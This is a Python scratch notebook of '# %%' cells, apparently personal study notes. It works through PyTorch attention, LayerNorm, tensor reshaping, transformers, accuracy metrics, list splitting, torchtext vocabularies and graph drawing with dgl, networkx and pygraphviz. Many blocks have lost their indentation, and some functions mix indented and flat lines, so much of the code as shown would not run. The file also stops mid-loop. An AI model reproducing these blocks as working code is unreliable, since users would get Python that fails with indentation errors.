# wait for all processes to finish by blocking one by one (this code could be problematic see spawn: https://pytorch.org/docs/stable/multiprocessing.html#spawning-subprocesses )
for p in processes:
p.join() # blocks until p is done
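# %%
# a sketch (my own, following the dist_tuto pattern above) of what `run` could look like: an
# all-reduce across the group, so every rank ends up with the sum of all ranks' tensors.
# it assumes the same init_process_and_run_parallel_fun setup from the previous cell.
import torch
import torch.distributed as dist

def run_all_reduce(rank, size):
    tensor = torch.ones(1) * rank
    dist.all_reduce(tensor, op=dist.ReduceOp.SUM)  # in-place; result is 0 + 1 + ... + (size - 1)
    print(f'rank {rank} has {tensor.item()} (expected {sum(range(size))})')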
# %%
# split string
print("asdf-ghjkl;".split('-'))
# %%
# what happens if we do a .item of a vector
x = torch.randn(1)
print(x.item())
y = torch.randn(1, 1)
print(y.item())
z = torch.randn(1, 4)
try:
    print(z.item())  # .item() only works for tensors with exactly one element, so this raises
except (ValueError, RuntimeError) as e:
    print(f'z.item() failed: {e}')
# %%
# attention mechanism from transformers
# inspired from but slightly modified to match equations from paper properly (better vectorization)
# https://towardsdatascience.com/illustrated-self-attention-2d627e33b20a
# -- get data set, each row is an input [N by D] --
import torch
x = [
[1.0, 0, 1, 0], # Input 1
[0, 2, 0, 2], # Input 2
[1, 1, 1, 1] # Input 3
]
x = torch.tensor(x)
print('Usual design matrix where the rows N is the # of examples and D columns the features [N, D]')
print(f'X = [N, D] = {x.size()}\n')
# -- get query, key, value matrices
w_key = [
[0.0, 0, 1],
[1, 1, 0],
[0, 1, 0],
[1, 1, 0]
]
w_query = [
[1.0, 0, 1],
[1, 0, 0],
[0, 0, 1],
[0, 1, 1]
]
w_value = [
[0.0, 2, 0],
[0, 3, 0],
[1, 0, 3],
[1, 1, 0]
]
w_key = torch.tensor(w_key)
w_query = torch.tensor(w_query)
w_value = torch.tensor(w_value)
print(f'w_key = [D, D_k] = {w_key.size()}')
print(f'w_qry = [D, D_qry] = {w_query.size()}')
print(f'w_val = [D, D_v] = {w_value.size()}\n')
# -- get Q, K, V matrices for each inputs --
keys = x @ w_key
querys = x @ w_query
values = x @ w_value # [N, D] [D, Dv] = [N, Dv]
# print(keys)
# print(querys)
# print(values)
print(f'keys = K = [N, D_k] = {keys.size()}')
print(f'qry = Q = [N, D_q] = {querys.size()}')
print(f'val = V = [N, D_v] = {values.size()}\n')
# -- calculate attention scores --
# [q1 ; q2; q3 ] @ [k1, k2, k3]
attn_scores = querys @ keys.T
print('Attention scores Q @ K.T')
print(f'attn_scores = [N, N] = {attn_scores.size()}')
print(f'each row i indicates how query values for input i compares to the keys for all others inputs\n')
# -- get real attention --
# have rows sum to 1
attn_scores_softmax = attn_scores.softmax(dim=1)
print(attn_scores_softmax[0, :].sum())
print(attn_scores_softmax[0, :])
print('a[0,0]=<q0, k0>, a[0,1]=<q0,k1> , a[0,2]=<q0,k2>')
# print(attn_scores_softmax)
print(
'Thus, each row i is a (normalized) weight [0,1] indicating how much each qry input i compares to all others inputs keys')
# For readability, approximate the above as follows
attn_scores_softmax = [
[0.0, 0.5, 0.5],
[0.0, 1.0, 0.0],
[0.0, 0.9, 0.1]
]
attn_scores_softmax = torch.tensor(attn_scores_softmax)
# -- --
# the output of attention from the tutorial:
print((values[:, None] * attn_scores_softmax.T[:, :, None]).sum(dim=0))
# using the equation from the paper [N, N] [N, Dv] = [N, Dv]
sf_qk_v = attn_scores_softmax @ values
print('Here are the attended "context" vectors!')
print(f'Atten(QK.T) @ V = A*V = [N, Dv] = {sf_qk_v.size()}')
print(sf_qk_v)
print((values[:, None] * attn_scores_softmax.T[:, :, None]).sum(dim=0))
print('Each row i is a context vector: the values v_1...v_Tx weighted by how much query i attends to each key')
print('i.e. AV[i,:] = sum_{t=1}^{Tx} a[i,t] * V[t,:]')
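# note: the walkthrough above omits the 1/sqrt(d_k) scaling from "Attention is All You Need";
# a minimal sketch of the scaled version, reusing querys/keys/values from this cell:
import math
d_k = keys.size(1)
scaled_attn = torch.softmax((querys @ keys.T) / math.sqrt(d_k), dim=1)
print(scaled_attn)
print(scaled_attn @ values)  # [N, Dv] context vectors with the proper scaling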
# %%
#
# from pathlib import Path
# from types import SimpleNamespace
# from torch.utils.tensorboard import SummaryWriter
#
# import pickle
#
# args = SimpleNamespace(log_dir=Path('~/Desktop/').expanduser())
# tb = SummaryWriter(log_dir=args.log_dir)  # uncomment this block for it to run
#
# # TypeError: cannot pickle 'tensorflow.python._pywrap_file_io.WritableFile' object
# pickle.dump(tb, open(args.log_dir / 'tb_test', 'w'))
# %%
import torch
class ResNet(torch.nn.Module):
def __init__(self, module):
super().__init__()
self.module = module
def forward(self, inputs):
return self.module(inputs) + inputs
#
# mdl = nn.Sequential()
# %%
# layer norm
import torch.nn as nn
input = torch.randn(20, 5, 10, 10)
# With Learnable Parameters
m = nn.LayerNorm(input.size()[1:])
# Without Learnable Parameters
m = nn.LayerNorm(input.size()[1:], elementwise_affine=False)
# Normalize over last two dimensions
m = nn.LayerNorm([10, 10])
# Normalize over last dimension of size 10
m = nn.LayerNorm(10)
# Activating the module
output = m(input)
input = torch.randn(20, 256)
# With Learnable Parameters
m = nn.LayerNorm(normalized_shape=256)
# Without Learnable Parameters
# m = nn.LayerNorm(input.size()[1:], elementwise_affine=False)
# Normalize over last two dimensions
# m = nn.LayerNorm([10, 10])
# Normalize over last dimension of size 10
# m = nn.LayerNorm(10)
# Activating the module
output = m(input)
print(output.size())
print('-- testing batch size 1 --')
input = torch.randn(1, 256)
# With Learnable Parameters
m = nn.LayerNorm(normalized_shape=256)
# Without Learnable Parameters
# m = nn.LayerNorm(input.size()[1:], elementwise_affine=False)
# Normalize over last two dimensions
# m = nn.LayerNorm([10, 10])
# Normalize over last dimension of size 10
# m = nn.LayerNorm(10)
# Activating the module
output = m(input)
print(output.size())
# %%
# f string formatting
# https://miguendes.me/73-examples-to-help-you-master-pythons-f-strings#how-to-add-leading-zeros
# fixed digits after f f-string
print(f'{10.1234:.2f}')
# pad to width 5 with leading zeros (note the 0 in front of the 5)
print(f'{42:05}')
num = 42
print(f"{num:05}")    # '00042'
print(f'{num:+010}')  # '+000000042'
print(f'{num:-010}')  # '0000000042'
print(f"{num:010}")   # '0000000042'
num = -42
print(f'{num:+010}')  # '-000000042'
print(f'{num:010}')   # '-000000042'
print(f'{num:-010}')  # '-000000042'
# %%
# https://pytorch.org/docs/stable/generated/torch.nn.Transformer.html
# https://pytorch.org/tutorials/beginner/transformer_tutorial.html
# src = torch.rand((10, 32, 512))
# tgt = torch.rand((20, 32, 512))
# out = transformer_model(src, tgt)
# %%
loss = nn.CrossEntropyLoss()
input = torch.randn(3, 5, requires_grad=True)
print(input.dtype)
target = torch.empty(3, dtype=torch.long).random_(5)
print(target.dtype)
output = loss(input, target)
output.backward()
# %%
# fragment pasted from a larger training script (spt_logits_t, spt_y_t and self.args are defined there):
# print(spt_logits_t.dtype)
# print(spt_y_t.dtype)
# inner_loss = self.args.criterion(spt_logits_t, spt_y_t)
# %%
# view(-1), view(-1, 1)
# https://stackoverflow.com/questions/50792316/what-does-1-mean-in-pytorch-view
# the actual value for this dimension will be inferred so that the number of elements in the view matches
# the original number of elements.
import torch
x = torch.randn(1, 5)
x = x.view(-1)
print(x.size())
x = torch.randn(2, 4)
x = x.view(-1, 8)
print(x.size())
x = torch.randn(2, 4)
x = x.view(-1)
print(x.size())
x = torch.randn(2, 4, 3)
x = x.view(-1)
print(x.size())
# %%
import torch
x = torch.randn(torch.Size([5, 1028]))
y = torch.randn(torch.Size([5, 1028]))
# x = (y == x).view(-1)
x = (y == x).reshape(-1)
print(x.size())
# %%
# contiguous vs non-contiguous tensors
# https://discuss.pytorch.org/t/contigious-vs-non-contigious-tensor/30107
# view vs reshape differ in whether they care about the underlying memory layout:
# sometimes `view` doesn't work due to contiguous/non-contiguous memory, so call `reshape(...)`
# (or `.contiguous().view(...)`) instead:
# https://discuss.pytorch.org/t/contigious-vs-non-contigious-tensor/30107 and see https://stackoverflow.com/questions/49643225/whats-the-difference-between-reshape-and-view-in-pytorch
# https://stackoverflow.com/questions/48915810/pytorch-contiguous
# https://stackoverflow.com/questions/54095351/in-pytorch-what-makes-a-tensor-have-non-contiguous-memory
# https://stackoverflow.com/questions/42479902/how-does-the-view-method-work-in-pytorch
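# a small demo (my own sketch) of the contiguity issue described above:
import torch
x = torch.randn(3, 4)
xt = x.t()  # transpose -> same storage, non-contiguous strides
print(xt.is_contiguous())  # False
try:
    xt.view(-1)
except RuntimeError as e:
    print(f'view failed: {e}')
print(xt.reshape(-1).size())            # reshape copies when it has to
print(xt.contiguous().view(-1).size())  # or make it contiguous explicitly, then view works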
# %%
# https://pytorch.org/tutorials/beginner/transformer_tutorial.html
# positional encoder pytorch
# transformer docs
# where S is the source sequence length,
# T is the target sequence length, N is the batch size, E is the feature number
import math  # needed for math.log in PositionalEncoding below
import torch
import torch.nn as nn
class PositionalEncoding(nn.Module):
def __init__(self, d_model, dropout=0.1, max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
transformer_model = nn.Transformer(nhead=16, num_encoder_layers=12)
src = torch.rand((10, 32, 512))
tgt = torch.rand((20, 32, 512))
out = transformer_model(src, tgt)
# generate_square_subsequent_mask(sz):
# Generate a square mask for the sequence.
# The masked positions are filled with float('-inf').
# Unmasked positions are filled with float(0.0).
# output = transformer_model(src, tgt, src_mask=src_mask, tgt_mask=tgt_mask)
# Transformer Layers
# nn.Transformer
#
# A transformer model.
#
# nn.TransformerEncoder
#
# TransformerEncoder is a stack of N encoder layers
#
# nn.TransformerDecoder
#
# TransformerDecoder is a stack of N decoder layers
#
# nn.TransformerEncoderLayer
#
# TransformerEncoderLayer is made up of self-attn and feedforward network.
#
# nn.TransformerDecoderLayer
#
# TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.
print(out.size())
# %%
# attention
# where S is the source sequence length, T is the target sequence length, N is the batch size, E is the feature number
# src: (S, N, E)(S,N,E) .
# tgt: (T, N, E)(T,N,E) .
# src_mask: (S, S)(S,S) .
# tgt_mask: (T, T)(T,T)
import torch
import torch.nn as nn
batch_size = 4
S = 12
T = 17
d_model = 8
nhead = 1
transformer_model = nn.Transformer(d_model=d_model, nhead=nhead, num_decoder_layers=6, num_encoder_layers=6)
src = torch.rand((S, batch_size, d_model))
tgt = torch.rand((T, batch_size, d_model))
out = transformer_model(src, tgt)
print(out.size())
mha = nn.MultiheadAttention(embed_dim=d_model, num_heads=nhead)
qry = src
key = src
value = src
out = mha(qry, key, value)
print(len(out))
# Shapes for outputs:
# attn_output: (L, N, E) where L is the target sequence length, N is the batch size, E is the embedding dimension.
# attn_output_weights: (N, L, S) where N is the batch size,
# L is the target sequence length, S is the source sequence length.
print(out[0].size())
print(out[1].size())
# %%
# https://stackoverflow.com/questions/52981833/sklearn-python-log-loss-for-logistic-regression-evaluation-raised-an-error/66569833#66569833
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from sklearn import metrics
X, y = load_iris(return_X_y=True)
clf = LogisticRegression(random_state=0).fit(X, y)
clf.predict(X[:2, :])
clf.predict_proba(X[:2, :])
clf.score(X, y)
y_probs = clf.predict_proba(X)
qry_loss_t = metrics.log_loss(y, y_probs)
# %%
# refs:
# https://stackoverflow.com/questions/51503851/calculate-the-accuracy-every-epoch-in-pytorch
# https://discuss.pytorch.org/t/how-to-calculate-accuracy-in-pytorch/80476/5
# https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649
# how to get the class prediction
batch_size = 4
n_classes = 2
y_logits = torch.randn(batch_size, n_classes) # usually the scores
print('scores (logits) for each class for each example in batch (how likely a class is unnormalized)')
print(y_logits)
print('the max over entire tensor (not usually what we want)')
print(y_logits.max())
print('the max over the n_classes dim. For each example in batch returns: '
'1) the highest score for each class (most likely class)\n, and '
'2) the idx (=class) with that highest score')
print(y_logits.max(1))
print('-- calculate accuracy --')
# computing accuracy in pytorch
"""
random.choice(a, size=None, replace=True, p=None)
Generates a random sample from a given 1-D array
for pytorch random choice https://stackoverflow.com/questions/59461811/random-choice-with-pytorch
"""
import torch
import torch.nn as nn
in_features = 1
n_classes = 10
batch_size = n_classes
mdl = nn.Linear(in_features=in_features, out_features=n_classes)
x = torch.randn(batch_size, in_features)
y_logits = mdl(x) # scores/logits for each example in batch [B, n_classes]
# get for each example in batch the label/idx most likely according to score
# y_max_idx[b] = y_pred[b] = argmax_{idx \in [n_classes]} y_logit[idx]
y_max_scores, y_max_idx = y_logits.max(dim=1)
y_pred = y_max_idx  # predictions are really the idx \in [n_classes] with the highest scores
y = torch.randint(high=n_classes, size=(batch_size,))
# accuracy for 1 batch
assert (y.size(0) == batch_size)
acc = (y == y_pred).sum() / y.size(0)
acc = acc.item()
print(y)
print(y_pred)
print(acc)
# %%
# topk accuracy
# torch.topk = Returns the k largest elements of the given input tensor along a given dimension.
import torch
batch_size = 2
n_classes = 3
y_logits = torch.randn(batch_size, n_classes)
print('- all values in tensor x')
print(y_logits)
print('\n- for each example in batch get top 2 most likely values & classes/idx (since dim=1 is the dim for classes)'
      '\n1) first are the actual top 2 scores & 2) then the indices/classes corresponding to those largest scores')
print(y_logits.topk(k=2, dim=1))
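# a sketch of turning torch.topk into a top-k accuracy (with made-up random labels y):
k = 2
y = torch.randint(high=n_classes, size=(batch_size,))
topk_idx = y_logits.topk(k=k, dim=1).indices       # [B, k] most likely classes per example
correct = (topk_idx == y.unsqueeze(1)).any(dim=1)  # [B] True if the true class is in the top-k
print(f'top-{k} accuracy = {correct.float().mean().item()}')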
# %%
from copy import deepcopy
from pathlib import Path
path_cluster = '/home/miranda9/data/logs/logs_Mar06_11-15-02_jobid_0_pid_3657/tb'
path_cluster_intel = '/homes/miranda9/data/logs/logs_Dec04_15-49-00_jobid_446010.iam-pbs/tb'
path_vision = '/home/miranda9/data/logs/logs_Dec04_18-39-14_jobid_1528/tb'
dirs = path_cluster.split('/')
for dir_name in deepcopy(dirs):
if dir_name == 'data':
break
else:
dirs.pop(0)
dirs = ['~'] + dirs
dirs = '/'.join(dirs)
dir = Path(dirs).expanduser()
path_cluster.replace('/home/miranda9/', '~')
print(dir)
# %%
# floats f-string
var = 1.0
print(f'{var}')
# f adds many ugly 0's
var = 1
print(f'{var:f}')
var = 0.0001
print(f'{var}')
# ok it truncates, no!
var = 1.0
print(f'{var:.2f}')
var = 0.0001
print(f'{var:.2f}')
# %%
import bisect
from collections import OrderedDict
p = 0
x = bisect.bisect_left([10, 20], p)
print(x)
p = 10
x = bisect.bisect_left([10, 20], p)
print(x)
p = 11
x = bisect.bisect_left([10, 20], p)
print(x)
p = 21
x = bisect.bisect_left([10, 20], p)
print(x)
#
# p = 10
# x = bisect.bisect_left(OrderedDict({10: 'a', 11: 'b'}), p)
# print()
# %%
# for indexing into an interval to get the index the value corresponds to
import bisect
flatten_lst_files = ['f1', 'f2', 'f3']
cumulative_end_index = [4, 5 + 6, 5 + 7 + 1]
print(cumulative_end_index)
files = {'f1': list(range(5)), 'f2': list(range(7)), 'f3': list(range(2))}
def get_lower_cumulative(file_idx):
    if file_idx == 0:
        return file_idx
    else:
        return cumulative_end_index[file_idx - 1] + 1
def get_node_idx(idx):
    # gets the index of the file this (global) idx falls into
    file_idx = bisect.bisect_left(cumulative_end_index, idx)
    # now get the actual value
    file = flatten_lst_files[file_idx]
    print(file)
    lower_cumulative_val = get_lower_cumulative(file_idx)
    node_idx = idx - lower_cumulative_val
    # print(node_idx)
    node = files[file][node_idx]
    # print(node)
    return node
for idx in range(5 + 7 + 2):
node = get_node_idx(idx)
print(node)
print()
# %%
# computing cumulative sums of counts/frequencies
import pandas as pd
# importing numpy module
import numpy as np
# making list of values
values = [3, 4, 7, 2, 0]
# making series from list
series = pd.Series(values)
# calling method
cumsum = list(series.cumsum())
cumsum = np.array(series.cumsum())
# display
print(cumsum)
# %%
# splitting list of files into 3 train, val, test
import numpy as np
def split_two(lst, ratio=[0.5, 0.5]):
assert (np.sum(ratio) == 1.0) # makes sure the splits make sense
train_ratio = ratio[0]
# note this function needs only the "middle" index to split, the remaining is the rest of the split
    indices_for_splitting = [int(len(lst) * train_ratio)]
    train, test = np.split(lst, indices_for_splitting)
return train, test
def split_three(lst, ratio=[0.8, 0.1, 0.1]):
import numpy as np
train_r, val_r, test_r = ratio
assert (np.sum(ratio) == 1.0) # makes sure the splits make sense
# note we only need to give the first 2 indices to split, the last one it returns the rest of the list or empty
    indices_for_splitting = [int(len(lst) * train_r), int(len(lst) * (train_r + val_r))]
    train, val, test = np.split(lst, indices_for_splitting)
return train, val, test
files = list(range(10))
train, test = split_two(files)
print(train, test)
train, val, test = split_three(files)
print(train, val, test)
# %%
from typing import List, NewType
# https://stackoverflow.com/questions/33045222/how-do-you-alias-a-type-in-python
Vector = List[float] # alias shortens
URL = NewType("URL", str) # new type
# this is better since URL is a string but any string is NOT usually a URL
print(URL is str)
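# tiny usage sketch (example values are mine): at runtime URL(...) just returns the plain str,
# the distinction only exists for static type checkers
v: Vector = [1.0, 2.0]
u = URL('https://example.com')
print(type(u))  # <class 'str'>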
# %%
# convert list of ints to tensor
import torch
y_batch = [944104324, 146561759, 938461041, 1035383419]
y_batch = torch.tensor(y_batch)
print(y_batch)
print(type(y_batch))
print(y_batch.dtype)
# %%
# counter
from collections import Counter
vocab = Counter()
lst = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4]
for elem in lst:
vocab.update([elem])
print(vocab)
vocab.update(lst)
print(vocab)
print(Counter(['a', 'a', 'b']))
# Counter({'R': 1, 'A': 1, 'Coq.Relations.Relation_Operators.clos_refl_trans': 1, '0': 1})
# vocab.update(['adsf'])
# vocab
# Counter({'R': 1, 'A': 1, 'Coq.Relations.Relation_Operators.clos_refl_trans': 1, '0': 1, 'adsf': 1})
# Counter(a=0)
# Counter({'a': 0})
# vocab.update({'qwert':0}
# %%
from argparse import Namespace
opts = Namespace(rank=-1, world_size=0, batch_size=4, split='train', num_workers=0)
opts.path2dataprep = Path('~/data/lasse_datasets_coq/dag_data_prep.pt').expanduser()
opts.path2vocabs = Path('~/data/lasse_datasets_coq/dag_counters.pt').expanduser()
opts.path2hash2idx = Path('~/data/lasse_datasets_coq/dag_hash2index.pt').expanduser()
counters = torch.load(opts.path2vocabs)
vocab = counters['leafs_counter']
constructors = counters['cons_counter']
db_hash2idx = torch.load(opts.path2hash2idx)
hash2idx = db_hash2idx['hash2idx']
num_tactic_hashes = len(hash2idx.keys())
# %%
# https://pytorch.org/tutorials/beginner/text_sentiment_ngrams_tutorial.html
import torchtext
from collections import Counter
# text_pipeline = lambda x: [vocab[token] for token in tokenizer(x)]
# label_pipeline = lambda x: int(x) - 1
counter = Counter()
counter.update(['a', 'a', 'a', 'bob', 'bob', 'cat', 'dog'])
print(counter)
vocab = torchtext.vocab.Vocab(counter)
vocab2 = torchtext.vocab.Vocab(counter, min_freq=2)
print(vocab)
# print('a' in vocab)
print(vocab['a'])
print(vocab['bob'])
print(vocab['cat'])
print(vocab['dog'])
print(vocab['asdf'])
print()
print(vocab2['a'])
print(vocab2['bob'])
print(vocab2['cat'])
print(vocab2['dog'])
print(vocab2['asdf'])
print()
print(len(vocab))
# text_pipeline = lambda x: [vocab[token] for token in tokenizer(x)]
#
# from torch.utils.data import DataLoader
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#
# def collate_batch(batch):
# label_list, text_list, offsets = [], [], [0]
# for (_label, _text) in batch:
# label_list.append(label_pipeline(_label))
# processed_text = torch.tensor(text_pipeline(_text), dtype=torch.int64)
# text_list.append(processed_text)
# offsets.append(processed_text.size(0))
# label_list = torch.tensor(label_list, dtype=torch.int64)
# offsets = torch.tensor(offsets[:-1]).cumsum(dim=0)
# text_list = torch.cat(text_list)
# return label_list.to(device), text_list.to(device), offsets.to(device)
#
# train_iter = AG_NEWS(split='train')
# dataloader = DataLoader(train_iter, batch_size=8, shuffle=False, collate_fn=collate_batch)
# %%
import torch
x = torch.randn([1, 4])
y = torch.randn([1, 4])
xy = torch.stack([x, y])
print(xy.size())
xy = torch.cat([x, y])
print(xy.size())
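# clarifying example (my addition): stack inserts a new dim, cat joins along an existing one
print(torch.stack([x, y], dim=0).size())  # torch.Size([2, 1, 4])
print(torch.cat([x, y], dim=1).size())    # torch.Size([1, 8])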
# %%
"""
python -m memory_profiler file.py
"""
# %%
# list of letters
letters = ['a', 'b', 'd', 'e', 'i', 'j', 'o']
# function that filters vowels
def filter_vowels(letter):
vowels = ['a', 'e', 'i', 'o', 'u']
if letter in vowels:
return True
else:
return False
print(filter)
filtered_vowels = filter(filter_vowels, letters)
print('The filtered vowels are:')
for vowel in filtered_vowels:
print(vowel)
# %%
# The filter() method constructs an iterator from elements of an iterable for which a function returns true.
# filter things that are not None, i.e. we want to keep things that are not None.
list2filter = ['a', 'b', None]
print(list2filter)
filteredlist = filter(lambda x: x is not None, list2filter)
print(list(filteredlist))
# this is much better: https://stackoverflow.com/questions/61925671/use-only-some-items-in-a-list-comprehension
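# the equivalent list-comprehension form the link above points to:
filtered_lst = [x for x in list2filter if x is not None]
print(filtered_lst)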
# %%
import os
from pathlib import Path
import capnp
# import dag_api_capnp
capnp.remove_import_hook()
try:
# first try to see if we are running a benchmark & the capnp schema is in the share conda folder
dag_api_capnp = str(Path(os.environ['CONDA_PREFIX'] + '/share/dag_api.capnp').expanduser())
dag_api_capnp = capnp.load(dag_api_capnp)
except:
# else run the one in the main project folder
dag_api_capnp = str(Path('~/coq-tactician-graph/src/dag_api.capnp').expanduser())
dag_api_capnp = capnp.load(dag_api_capnp)
# %%
import capnp
capnp.remove_import_hook()
example_msg_capnp = Path("~/ultimate-utils/example_msg.capnp").expanduser()
example_msg_capnp = capnp.load(str(example_msg_capnp))
# Building
addresses = example_msg_capnp.AddressBook.newMessage()
people = addresses.init('people', 1)
# %%
# python index slicing
lst = [1, 2, 3, 4]
print(lst[:0])
print(lst[:1])
print(lst[:2])
# the stop index is non-inclusive
# %%
import dgl.data
dataset = dgl.data.CoraGraphDataset()
print('Number of categories:', dataset.num_classes)
# %%
import dgl
import numpy as np
import torch
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
src = np.array([0, 0, 0, 0, 0])
dst = np.array([1, 2, 3, 4, 5])
u = np.concatenate([src, dst])
v = np.concatenate([dst, src])
# Construct a DGLGraph
dgl.DGLGraph((u, v))
# %%
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
nx_G = g.to_networkx().to_undirected()
print(f'{nx_G=}')
# Kamada-Kawaii layout usually looks pretty for arbitrary graphs
pos = nx.kamada_kawai_layout(nx_G)
nx.draw(nx_G, pos, with_labels=True)
plt.show()
# %%
# https://stackoverflow.com/questions/28533111/plotting-networkx-graph-with-node-labels-defaulting-to-node-name
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
labels = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app5"}
# Kamada-Kawaii layout usually looks pretty for arbitrary graphs
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, labels=labels, with_labels=True)
plt.show()
# %%
from graphviz import Digraph
g = Digraph('G', filename='hello2.gv')
print(f'{g=}')
g.edge('Hello', 'World')
g.view()
# %%
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
g = nx.nx_agraph.to_agraph(g)
g.layout()
# g.draw()
g.draw("file.png")
print(f'{g=}')
# plt.show()
# from IPython.display import Image, display
#
# def view_pydot(pdot):
# plt = Image(pdot.create_png())
# display(plt)
#
# view_pydot(g)
# %%
# https://stackoverflow.com/questions/28533111/plotting-networkx-graph-with-node-labels-defaulting-to-node-name
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
# relabel
int2label = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app5"}
g = nx.relabel_nodes(g, int2label)
# Kamada-Kawaii layout usually looks pretty for arbitrary graphs
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, with_labels=True)
plt.show()
#%%
# https://stackoverflow.com/questions/28533111/plotting-networkx-graph-with-node-labels-defaulting-to-node-name
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from pathlib import Path
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
# relabel
int2label = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app5"}
g = nx.relabel_nodes(g, int2label)
# https://networkx.org/documentation/stable/reference/drawing.html#module-networkx.drawing.layout
g = nx.nx_agraph.to_agraph(g)
print(f'{g=}')
print(f'{g.string()=}')
# draw
g.layout()
g.draw("file.png")
# https://stackoverflow.com/questions/20597088/display-a-png-image-from-python-on-mint-15-linux
img = mpimg.imread('file.png')
plt.imshow(img)
plt.show()
# remove file https://stackoverflow.com/questions/6996603/how-to-delete-a-file-or-folder
Path('./file.png').expanduser().unlink()
# import os
# os.remove('./file.png')
# %%
# networkx to dgl: https://docs.dgl.ai/en/0.6.x/generated/dgl.from_networkx.html
import dgl
import networkx as nx
import numpy as np
import torch
nx_g = nx.DiGraph()
# Add 3 nodes and two features for them
nx_g.add_nodes_from([0, 1, 2], feat1=np.zeros((3, 1)), feat2=np.ones((3, 1)))
# Add 2 edges (1, 2) and (2, 1) with two features, one being edge IDs
nx_g.add_edge(1, 2, weight=np.ones((1, 1)), eid=np.array([1]))
nx_g.add_edge(2, 1, weight=np.ones((1, 1)), eid=np.array([0]))
g = dgl.from_networkx(nx_g)
# ... https://docs.dgl.ai/en/0.6.x/generated/dgl.from_networkx.html
# %%
import networkx as nx
import matplotlib.pyplot as plt
G = nx.Graph()
G.add_node('a')
G.add_node('b', attr1='cons')
print(f'{G=}')
pos = nx.kamada_kawai_layout(G)
nx.draw(G, pos, with_labels=True)
plt.show()
# adding repeated edges and nodes: https://stackoverflow.com/questions/28488559/networkx-duplicate-edges/51611005
#%%
import pylab
import networkx as nx
g=nx.Graph()
g.add_node('Golf',size='small')
g.add_node('Hummer',size='huge')
g.add_edge('Golf','Hummer')
labels = nx.get_node_attributes(g, 'size')
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, labels=labels, with_labels=True)
# nx.draw(g, labels=labels)
pylab.show()
#%%
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from pathlib import Path
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
# relabel
int2label = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app"}
g = nx.relabel_nodes(g, int2label)
# https://networkx.org/documentation/stable/reference/drawing.html#module-networkx.drawing.layout
g = nx.nx_agraph.to_agraph(g)
print(f'{g=}')
print(f'{g.string()=}')
# draw
g.layout()
g.draw("file.png")
# https://stackoverflow.com/questions/20597088/display-a-png-image-from-python-on-mint-15-linux
img = mpimg.imread('file.png')
plt.imshow(img)
plt.show()
# remove file https://stackoverflow.com/questions/6996603/how-to-delete-a-file-or-folder
Path('./file.png').expanduser().unlink()
# import os
# os.remove('./file.png')
#%%
import pylab
import networkx as nx
g=nx.Graph()
g.add_node('Golf',size='small')
g.add_node('Hummer',size='huge')
g.add_edge('Golf','Hummer')
labels = nx.get_node_attributes(g, 'size')
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, labels=labels, with_labels=True)
pylab.show()
#%%
import pygraphviz as pgv
g = pgv.AGraph()
g.add_node('Golf',label='small')
g.add_node('Hummer',label='huge')
g.add_edge('Golf','Hummer')
# labels = nx.get_node_attributes(g, 'size')
# pos = nx.kamada_kawai_layout(g)
# nx.draw(g, pos, labels=labels, with_labels=True)
# pylab.show()
g.layout()
g.draw('file.png')
img = mpimg.imread('file.png')
plt.imshow(img)
plt.show()
# Path('./file.png').expanduser().unlink()
#%%
import pygraphviz as pgv
G=pgv.AGraph()
ndlist = [1,2,3]
for node in ndlist:
# label = "Label #" + str(node)
label = "app"
